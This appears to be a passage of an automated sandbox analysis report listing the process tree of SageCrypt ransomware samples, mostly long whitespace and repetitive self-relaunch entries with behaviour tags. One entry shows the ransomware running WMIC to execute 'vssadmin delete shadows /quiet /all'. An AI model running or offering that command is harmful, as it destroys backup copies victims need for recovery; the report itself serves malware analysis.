                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
  PID:8044
• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
  3⤵
  PID:8084
• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
  3⤵
  PID:8056
• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
  3⤵
  PID:7972
• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
  3⤵
  PID:8092
• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
  3⤵
  PID:8100
• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
  Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
  2⤵
  • Executes dropped EXE
  • Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:2220
• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
              • Executes dropped EXE
              PID:5784
              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                8⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1508
                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                  9⤵
                  • Executes dropped EXE
                  PID:4932
                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe
                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g
                    10⤵
                      PID:4680
  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe
    Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe
    2⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1740
    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe
      Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe
      3⤵
      • Drops startup file
      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /quiet /all"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
